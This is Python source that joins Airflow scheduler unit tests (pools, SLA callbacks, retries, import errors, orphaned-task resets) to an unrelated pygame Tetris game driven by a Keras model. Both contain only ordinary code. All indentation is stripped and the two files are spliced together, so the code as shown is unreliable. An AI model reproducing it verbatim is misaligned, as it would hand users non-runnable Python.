def test_scheduler_verify_pool_full(self, mock_pool_full):
"""
Test task instances not queued when pool is full
"""
mock_pool_full.return_value = False
dag = DAG(
dag_id='test_scheduler_verify_pool_full',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow',
pool='test_scheduler_verify_pool_full')
session = settings.Session()
pool = Pool(pool='test_scheduler_verify_pool_full', slots=1)
session.add(pool)
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
# Create 2 dagruns, which will create 2 task instances.
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEquals(dr.execution_date, DEFAULT_DATE)
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
queue = []
scheduler._process_task_instances(dag, queue=queue)
self.assertEquals(len(queue), 2)
dagbag = self._make_simple_dag_bag([dag])
# Recreated part of the scheduler here, to kick off tasks -> executor
for ti_key in queue:
task = dag.get_task(ti_key[1])
ti = TI(task, ti_key[2])
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# Also save this task instance to the DB.
session.merge(ti)
session.commit()
scheduler._execute_task_instances(dagbag,
(State.SCHEDULED,
State.UP_FOR_RETRY))
self.assertEquals(len(scheduler.executor.queued_tasks), 1)
def test_scheduler_auto_align(self):
"""
Test if the schedule_interval will be auto aligned with the start_date
such that if the start_date coincides with the schedule the first
execution_date will be start_date, otherwise it will be start_date +
interval.
"""
dag = DAG(
dag_id='test_scheduler_auto_align_1',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="4 5 * * *"
)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEquals(dr.execution_date, timezone.datetime(2016, 1, 2, 5, 4))
dag = DAG(
dag_id='test_scheduler_auto_align_2',
start_date=timezone.datetime(2016, 1, 1, 10, 10, 0),
schedule_interval="10 10 * * *"
)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
self.assertEquals(dr.execution_date, timezone.datetime(2016, 1, 1, 10, 10))
def test_scheduler_reschedule(self):
"""
Checks if tasks that are not taken up by the executor
get rescheduled
"""
executor = TestExecutor()
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_scheduler_reschedule',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
@mock.patch('airflow.models.DagBag', return_value=dagbag)
@mock.patch('airflow.models.DagBag.collect_dags')
def do_schedule(function, function2):
# Use a empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
do_schedule()
self.assertEquals(1, len(executor.queued_tasks))
executor.queued_tasks.clear()
do_schedule()
self.assertEquals(2, len(executor.queued_tasks))
def test_scheduler_sla_miss_callback(self):
"""
Test that the scheduler does not call the sla_miss_callback when a notification has already been sent
"""
session = settings.Session()
# Mock the callback function so we can verify that it was not called
sla_callback = MagicMock()
# Create dag with a start of 2 days ago, but an sla of 1 day ago so we'll already have an sla_miss on the books
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date,
'sla': datetime.timedelta(days=1)})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow')
# Create a TaskInstance for two days ago
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(models.SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date,
email_sent=False,
notification_sent=True))
# Now call manage_slas and see if the sla_miss callback gets called
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
scheduler.manage_slas(dag=dag, session=session)
sla_callback.assert_not_called()
def test_scheduler_sla_miss_callback_exception(self):
"""
Test that the scheduler gracefully logs an exception if there is a problem
calling the sla_miss_callback
"""
session = settings.Session()
sla_callback = MagicMock(side_effect=RuntimeError('Could not call function'))
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
sla_miss_callback=sla_callback,
default_args={'start_date': test_start_date})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow',
sla=datetime.timedelta(hours=1))
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='Success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(models.SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
# Now call manage_slas and see if the sla_miss callback gets called
scheduler = SchedulerJob(dag_id='test_sla_miss')
with mock.patch('airflow.jobs.SchedulerJob.log',
new_callable=PropertyMock) as mock_log:
scheduler.manage_slas(dag=dag, session=session)
sla_callback.assert_called()
mock_log().exception.assert_called_with(
'Could not call sla_miss_callback for DAG %s',
'test_sla_miss')
@mock.patch("airflow.utils.email.send_email")
def test_scheduler_sla_miss_email_exception(self, mock_send_email):
"""
Test that the scheduler gracefully logs an exception if there is a problem
sending an email
"""
session = settings.Session()
# Mock the callback function so we can verify that it was not called
mock_send_email.side_effect = RuntimeError('Could not send an email')
test_start_date = days_ago(2)
dag = DAG(dag_id='test_sla_miss',
default_args={'start_date': test_start_date,
'sla': datetime.timedelta(days=1)})
task = DummyOperator(task_id='dummy',
dag=dag,
owner='airflow',
email='test@test.com',
sla=datetime.timedelta(hours=1))
session.merge(models.TaskInstance(task=task,
execution_date=test_start_date,
state='Success'))
# Create an SlaMiss where notification was sent, but email was not
session.merge(models.SlaMiss(task_id='dummy',
dag_id='test_sla_miss',
execution_date=test_start_date))
scheduler = SchedulerJob(dag_id='test_sla_miss',
num_runs=1)
with mock.patch('airflow.jobs.SchedulerJob.log',
new_callable=PropertyMock) as mock_log:
scheduler.manage_slas(dag=dag, session=session)
mock_log().exception.assert_called_with(
'Could not send SLA Miss email notification for DAG %s',
'test_sla_miss')
def test_retry_still_in_executor(self):
"""
Checks if the scheduler does not put a task in limbo, when a task is retried
but is still present in the executor.
"""
executor = TestExecutor()
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_retry_still_in_executor',
start_date=DEFAULT_DATE,
schedule_interval="@once")
dag_task1 = BashOperator(
task_id='test_retry_handling_op',
bash_command='exit 1',
retries=1,
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
@mock.patch('airflow.models.DagBag', return_value=dagbag)
@mock.patch('airflow.models.DagBag.collect_dags')
def do_schedule(function, function2):
# Use a empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
do_schedule()
self.assertEquals(1, len(executor.queued_tasks))
def run_with_error(task):
try:
task.run()
except (AirflowException, XToolException):
pass
ti_tuple = six.next(six.itervalues(executor.queued_tasks))
(command, priority, queue, ti) = ti_tuple
ti.task = dag_task1
self.assertEqual(ti.try_number, 1)
# fail execution
run_with_error(ti)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
self.assertEqual(ti.try_number, 2)
ti.refresh_from_db(lock_for_update=True, session=session)
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
# do not schedule
do_schedule()
self.assertTrue(executor.has_task(ti))
ti.refresh_from_db()
# removing self.assertEqual(ti.state, State.SCHEDULED)
# as scheduler will move state from SCHEDULED to QUEUED
# now the executor has cleared and it should be allowed the re-queue
executor.queued_tasks.clear()
do_schedule()
ti.refresh_from_db()
self.assertEqual(ti.state, State.QUEUED)
# calling below again in order to ensure with try_number 2,
# scheduler doesn't put task in queue
do_schedule()
self.assertEquals(1, len(executor.queued_tasks))
@unittest.skipUnless("INTEGRATION" in os.environ, "Can only run end to end")
def test_retry_handling_job(self):
"""
Integration test of the scheduler not accidentally resetting
the try_numbers for a task
"""
dag = self.dagbag.get_dag('test_retry_handling_job')
dag_task1 = dag.get_task("test_retry_handling_op")
dag.clear()
scheduler = SchedulerJob(dag_id=dag.dag_id,
num_runs=1)
scheduler.heartrate = 0
scheduler.run()
session = settings.Session()
ti = session.query(TI).filter(TI.dag_id==dag.dag_id,
TI.task_id==dag_task1.task_id).first()
# make sure the counter has increased
self.assertEqual(ti.try_number, 2)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
def test_scheduler_run_duration(self):
"""
Verifies that the scheduler run duration limit is followed.
"""
dag_id = 'test_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertTrue(dag.start_date > DEFAULT_DATE)
expected_run_duration = 5
start_time = timezone.utcnow()
scheduler = SchedulerJob(dag_id,
run_duration=expected_run_duration)
scheduler.run()
end_time = timezone.utcnow()
run_duration = (end_time - start_time).total_seconds()
logging.info("Test ran in %.2fs, expected %.2fs",
run_duration,
expected_run_duration)
self.assertLess(run_duration - expected_run_duration, 5.0)
def test_dag_with_system_exit(self):
"""
Test to check that a DAG with a system.exit() doesn't break the scheduler.
"""
dag_id = 'exit_test_dag'
dag_ids = [dag_id]
dag_directory = os.path.join(settings.DAGS_FOLDER,
"..",
"dags_with_system_exit")
dag_file = os.path.join(dag_directory,
'b_test_scheduler_dags.py')
dagbag = DagBag(dag_folder=dag_file)
for dag_id in dag_ids:
dag = dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
subdir=dag_directory,
num_runs=1)
scheduler.run()
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
def test_dag_get_active_runs(self):
"""
Test to check that a DAG returns its active runs
"""
now = timezone.utcnow()
six_hours_ago_to_the_hour = (now - datetime.timedelta(hours=6)).replace(minute=0, second=0, microsecond=0)
START_DATE = six_hours_ago_to_the_hour
DAG_NAME1 = 'get_active_runs_test'
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': START_DATE
}
dag1 = DAG(DAG_NAME1,
schedule_interval='* * * * *',
max_active_runs=1,
default_args=default_args
)
run_this_1 = DummyOperator(task_id='run_this_1', dag=dag1)
run_this_2 = DummyOperator(task_id='run_this_2', dag=dag1)
run_this_2.set_upstream(run_this_1)
run_this_3 = DummyOperator(task_id='run_this_3', dag=dag1)
run_this_3.set_upstream(run_this_2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag1.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag1.clear()
dr = scheduler.create_dag_run(dag1)
# We had better get a dag run
self.assertIsNotNone(dr)
execution_date = dr.execution_date
running_dates = dag1.get_active_runs()
try:
running_date = running_dates[0]
except:
running_date = 'Except'
self.assertEqual(execution_date, running_date, 'Running Date must match Execution Date')
def test_dag_catchup_option(self):
"""
Test to check that a DAG with catchup = False only schedules beginning now, not back to the start date
"""
def setup_dag(dag_id, schedule_interval, start_date, catchup):
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': start_date
}
dag = DAG(dag_id,
schedule_interval=schedule_interval,
max_active_runs=1,
catchup=catchup,
default_args=default_args)
t1 = DummyOperator(task_id='t1', dag=dag)
t2 = DummyOperator(task_id='t2', dag=dag)
t2.set_upstream(t1)
t3 = DummyOperator(task_id='t3', dag=dag)
t3.set_upstream(t2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
return dag
now = timezone.utcnow()
six_hours_ago_to_the_hour = (now - datetime.timedelta(hours=6)).replace(
minute=0, second=0, microsecond=0)
half_an_hour_ago = now - datetime.timedelta(minutes=30)
two_hours_ago = now - datetime.timedelta(hours=2)
scheduler = SchedulerJob()
dag1 = setup_dag(dag_id='dag_with_catchup',
schedule_interval='* * * * *',
start_date=six_hours_ago_to_the_hour,
catchup=True)
default_catchup = configuration.conf.getboolean('scheduler', 'catchup_by_default')
self.assertEqual(default_catchup, True)
self.assertEqual(dag1.catchup, True)
dag2 = setup_dag(dag_id='dag_without_catchup_ten_minute',
schedule_interval='*/10 * * * *',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag2)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last half an hour, not 6 hours ago
self.assertGreater(dr.execution_date, half_an_hour_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
dag3 = setup_dag(dag_id='dag_without_catchup_hourly',
schedule_interval='@hourly',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag3)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last 2 hours, not 6 hours ago
self.assertGreater(dr.execution_date, two_hours_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
dag4 = setup_dag(dag_id='dag_without_catchup_once',
schedule_interval='@once',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag4)
self.assertIsNotNone(dr)
def test_add_unparseable_file_before_sched_start_creates_import_error(self):
try:
dags_folder = mkdtemp()
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_add_unparseable_file_after_sched_start_creates_import_error(self):
try:
dags_folder = mkdtemp()
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_no_import_errors_with_parseable_dag(self):
try:
dags_folder = mkdtemp()
parseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(parseable_filename, 'w') as parseable_file:
parseable_file.writelines(PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_new_import_error_replaces_old(self):
try:
dags_folder = mkdtemp()
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Generate replacement import error (the error will be on the second line now)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(
PARSEABLE_DAG_FILE_CONTENTS +
os.linesep +
UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 2)".format(TEMP_DAG_FILENAME))
def test_remove_error_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Remove the import error from the file
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(
PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_remove_file_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
# Rerun the scheduler once the dag file has been removed
self.run_single_scheduler_loop_with_no_dags(dags_folder)
session = settings.Session()
import_errors = session.query(models.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_list_py_file_paths(self):
"""
[JIRA-1357] Test the 'list_py_file_paths' function used by the
scheduler to list and load DAGs.
"""
detected_files = []
expected_files = []
for file_name in os.listdir(TEST_DAGS_FOLDER):
if file_name.endswith('.py') or file_name.endswith('.zip'):
if file_name not in ['no_dags.py']:
expected_files.append(
'{}/{}'.format(TEST_DAGS_FOLDER, file_name))
for file_path in list_py_file_paths(TEST_DAGS_FOLDER):
detected_files.append(file_path)
self.assertEqual(sorted(detected_files), sorted(expected_files))
def test_reset_orphaned_tasks_nothing(self):
"""Try with nothing. """
scheduler = SchedulerJob()
session = settings.Session()
self.assertEqual(
0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_external_triggered_dag(self):
dag_id = 'test_reset_orphaned_tasks_external_triggered_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
dr1.state = State.RUNNING
ti.state = State.SCHEDULED
dr1.external_trigger = True
session.merge(ti)
session.merge(dr1)
session.commit()
reset_tis = scheduler.reset_state_for_orphaned_tasks(session=session)
self.assertEquals(1, len(reset_tis))
def test_reset_orphaned_tasks_backfill_dag(self):
dag_id = 'test_reset_orphaned_tasks_backfill_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
ti.state = State.SCHEDULED
dr1.state = State.RUNNING
dr1.run_id = BackfillJob.ID_PREFIX + '_sdfsfdfsd'
session.merge(ti)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_specified_dagrun(self):
"""Try to reset when we specify a dagrun and ensure nothing else is."""
dag_id = 'test_reset_orphaned_tasks_specified_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
# make two dagruns, only reset for one
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
dr2.state = State.RUNNING
ti1 = dr1.get_task_instances(session=session)[0]
ti2 = dr2.get_task_instances(session=session)[0]
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(dr1)
session.merge(dr2)
session.commit()
reset_tis = scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr2, session=session)
self.assertEquals(1, len(reset_tis))
ti1.refresh_from_db(session=session)
ti2.refresh_from_db(session=session)
self.assertEquals(State.SCHEDULED, ti1.state)
self.assertEquals(State.NONE, ti2.state)
def test_reset_orphaned_tasks_nonexistent_dagrun(self):
"""Make sure a task in an orphaned state is not reset if it has no dagrun. """
dag_id = 'test_reset_orphaned_tasks_nonexistent_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
task = DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
session.add(ti)
session.commit()
ti.refresh_from_db()
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_no_orphans(self):
dag_id = 'test_reset_orphaned_tasks_no_orphans'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
tis = dr1.get_task_instances(session=session)
tis[0].state = State.RUNNING
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
tis[0].refresh_from_db()
self.assertEquals(State.RUNNING, tis[0].state)
def test_reset_orphaned_tasks_non_running_dagruns(self):
"""Ensure orphaned tasks with non-running dagruns are not reset."""
dag_id = 'test_reset_orphaned_tasks_non_running_dagruns'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
tis = dr1.get_task_instances(session=session)
self.assertEquals(1, len(tis))
tis[0].state = State.SCHEDULED
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEquals(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_with_orphans(self):
"""Create dagruns and esnure only ones with correct states are reset."""
prefix = 'scheduler_job_test_test_reset_orphaned_tasks'
states = [State.QUEUED, State.SCHEDULED, State.NONE, State.RUNNING, State.SUCCESS]
states_to_reset = [State.QUEUED, State.SCHEDULED, State.NONE]
dag = DAG(dag_id=prefix,
start_date=DEFAULT_DATE,
schedule_interval="@daily")
tasks = []
for i in range(len(states)):
task_id = "{}_task_{}".format(prefix, i)
task = DummyOperator(task_id=task_id, dag=dag)
tasks.append(task)
scheduler = SchedulerJob()
session = settings.Session()
# create dagruns
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
dr2.state = State.SUCCESS
session.merge(dr1)
session.merge(dr2)
session.commit()
# create taskinstances and set states
dr1_tis = []
dr2_tis = []
for i, (task, state) in enumerate(zip(tasks, states)):
ti1 = TI(task, dr1.execution_date)
ti2 = TI(task, dr2.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = state
ti2.state = state
dr1_tis.append(ti1)
dr2_tis.append(ti2)
session.merge(ti1)
session.merge(ti2)
session.commit()
self.assertEqual(2, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
for ti in dr1_tis + dr2_tis:
ti.refresh_from_db()
# running dagrun should be reset
for state, ti in zip(states, dr1_tis):
if state in states_to_reset:
self.assertIsNone(ti.state)
else:
self.assertEqual(state, ti.state)
# otherwise not
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
for state, ti in zip(states, dr1_tis):
ti.state = state
session.commit()
scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr1, session=session)
# check same for dag_run version
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
session.close()
|
main.py | import argparse
import copy
import random
import sys
import threading
import time
import numpy as np
import tensorflow.keras as ks
import loguru
import json
import pygame
from pygame import K_DOWN, K_LEFT, K_UP, K_RIGHT, K_KP_ENTER
import colors
from piece import Piece
from board import Board, PIECE_FACTORIES
from data_model import DataStore, Instance
from rnn import map_data, split_sequences, STEPS
# Only initialize display and font engines
pygame.display.init()
pygame.font.init()
logger = loguru.logger
size = width, height = 350, 400
data_store = None
state = None
def run_data_store() -> None:
logger.info("Started data runner")
data_store.run()
def get_inputs_user(event: pygame.event) -> np.array:
key = pygame.key.get_pressed()
return np.array([key[K_UP], key[K_DOWN], key[K_LEFT], key[K_RIGHT]])
def get_rand_piece() -> 'Piece':
piece_idx = random.randint(1, len(PIECE_FACTORIES))
curr_piece = PIECE_FACTORIES[piece_idx - 1].create_piece()
return curr_piece
def calc_score(level: int, rows: int) -> int:
pts = {1: 40, 2: 100, 3: 300, 4: 1200}
return pts.get(rows, 0) * (level + 1)
def calc_speed(level: int) -> int:
return max(1, 48 - (level * 5))
def print_line(screen: pygame.display, text: str, center: (int, int)) -> None:
font = pygame.font.FontType('freesansbold.ttf', 20)
surface = font.render(text, True, colors.WHITE)
screen.blit(surface, dest=center)
def print_stats(
screen: pygame.display,
level: int,
score: int,
lines_cleared: int,
) -> None:
print_line(screen, "Level: %d" % level, (235, 160))
print_line(screen, "Score: %d" % score, (235, 180))
print_line(screen, "Lines: %d" % lines_cleared, (235, 200))
def show_next_up(
screen: pygame.display,
board: 'Board',
piece: 'Piece'
) -> None:
print_line(screen, "Next piece:", (225, 10))
cp = piece.copy()
cp.pos = np.array([12, 2])
board.render_piece(screen, cp)
def show_message(
screen: pygame.display,
msg: str
) -> None:
screen.fill(colors.BLACK)
font = pygame.font.FontType('freesansbold.ttf', 20)
surface = font.render(msg, True, colors.WHITE)
rectangle = surface.get_rect()
rectangle.center = (width // 2, height // 2)
screen.blit(surface, rectangle)
pygame.display.update()
def predict_inputs(model, curr_input):
global state
state.pop(0)
state.append(json.loads(str(curr_input)))
(b, aux), _ = map_data(state)
b, aux, _ = split_sequences(b, aux, None, STEPS)
raw_inputs = model.predict(
{
"board": b[0:1],
"aux": aux[0:1],
}
)[0]
inputs = np.round(raw_inputs + 0.3)
inputs[1] = 0
return inputs
def play(**kwargs) -> None:
# Initialize game data
score = 0
level = 0
lines_cleared = 0
random.seed(time.time())
screen = pygame.display.set_mode(size)
TIME_BETWEEN_TICKS = 0.5
last_tick_time = time.time()
screen.fill(colors.BLACK)
# Initial render
board = Board()
board.render(screen)
pygame.display.update()
# Initial pieces
piece = get_rand_piece()
npiece = get_rand_piece()
curr_input = Instance(board.get_board(), np.array([0, 0, 0, 0]),
np.array([0, 0, 0, 0]), npiece.ID)
# Determine if a model was provided to play
isModel = False
model = None
model_file = kwargs.get("model_file", "default")
global state
state = []
if model_file is not None:
isModel = True
TIME_BETWEEN_TICKS = 0.001
model = ks.models.load_model(model_file)
curr_state = json.loads(str(curr_input))
for i in range(STEPS+1):
state.append(copy.deepcopy(curr_state))
# Initialize data collection
global data_store
if not isModel:
data_store = DataStore(kwargs.get("name", "default"))
data_store_thread = threading.Thread(target=run_data_store)
data_store_thread.start()
# Game loop
while not board.game_over():
# Clear screen and inputs
screen.fill(colors.BLACK)
inputs = np.array([0, 0, 0, 0])
show_next_up(screen, board, npiece)
# Handle events
if isModel:
curr_input = Instance(
board.get_board(),
curr_input.current_move,
inputs,
npiece.ID
)
inputs = predict_inputs(model, curr_input)
else:
for event in pygame.event.get():
if event.type == pygame.KEYDOWN: # User provided input
inputs = get_inputs_user(event)
curr_input = Instance(
board.get_board(),
curr_input.current_move,
inputs,
npiece.ID
)
data_store.write(str(curr_input))
if event.type == pygame.QUIT: # Peacefully exit
data_store.stop(write=False)
data_store_thread.join()
sys.exit()
piece = board.apply_command(piece, inputs) # Get updated piece
# Simple game tick control, runs for each game tick
if time.time() - last_tick_time > TIME_BETWEEN_TICKS:
piece = board.move_down(piece)
last_tick_time = time.time()
curr_input = Instance(
board.get_board(),
curr_input.current_move,
inputs,
npiece.ID
)
if isModel:
inputs = predict_inputs(model, curr_input)
else:
data_store.write(str(curr_input))
# Redraw board and moving piece
board.render(screen)
board.render_piece(screen, piece)
if piece.isSet: # collided with bottom or another piece on tick
curr_input = Instance(
board.get_board(),
curr_input.current_move,
inputs,
npiece.ID
)
if isModel:
inputs = predict_inputs(model, curr_input)
else:
data_store.write(str(curr_input))
# Bring in next piece, get next piece
piece = npiece.copy()
npiece = get_rand_piece()
# Update stats
removed_rows = board.check_rows()
lines_cleared += removed_rows
score += calc_score(level, removed_rows)
level = lines_cleared // 10
# Update screen
print_stats(screen, level, score, lines_cleared)
pygame.display.update()
# Game over messages and clean up
if isModel:
show_message(screen, "Game Over - Score: {}".format(score))
